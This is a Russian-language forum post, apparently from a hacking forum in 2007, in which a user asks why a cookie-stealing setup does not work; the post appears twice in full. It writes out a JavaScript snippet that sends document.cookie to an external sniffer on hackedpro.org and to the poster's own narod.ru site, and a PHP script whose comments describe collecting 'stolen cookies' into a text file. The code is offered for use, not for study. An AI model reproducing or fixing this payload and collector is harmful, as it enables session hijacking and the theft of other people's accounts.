Miixxa
19.07.2007, 12:27
вообщем у меня вопрос на счет перехвата cookies, можете мне объяснить, что я не так делаю?
вот есть скажем к примеру:
1. лог сниффера http://hackedpro.org/tools/sniff/log.php
2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif
начала с того что просто тупо в браузере ввел:
http://hackedpro.org/tools/sniff/s.gif?document.cookie
в логе посмотрел, получил инфу кроме моего cookies
далее создал файл с раширением html в котором:
<script>
img = new Image();
img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
</script>
запустил его, эффект тот же (все кроме cookies).
Далее разместил на сайте www.miixxa.narod.ru
2 файла:
первый php-script.php в котором:
<?
$query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
$fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); } //после записи закрыли файл.
else {
echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
}
?>
и второй файл cookies.txt
Создал третий файл 1.html в котором:
<script>
img = new Image();
img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
</script>
запустил этот файл, проверил cookies.txt - ничего.
Что я не так делаю? можете помочь?
вот есть скажем к примеру:
1. лог сниффера http://hackedpro.org/tools/sniff/log.php
2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif
начала с того что просто тупо в браузере ввел:
http://hackedpro.org/tools/sniff/s.gif?document.cookie
в логе посмотрел, получил инфу кроме моего cookies
далее создал файл с раширением html в котором:
<script>
img = new Image();
img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
</script>
запустил его, эффект тот же (все кроме cookies).
Далее разместил на сайте www.miixxa.narod.ru
2 файла:
первый php-script.php в котором:
<?
$query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
$fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); } //после записи закрыли файл.
else {
echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
}
?>
и второй файл cookies.txt
Создал третий файл 1.html в котором:
<script>
img = new Image();
img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
</script>
запустил этот файл, проверил cookies.txt - ничего.
Что я не так делаю? можете помочь?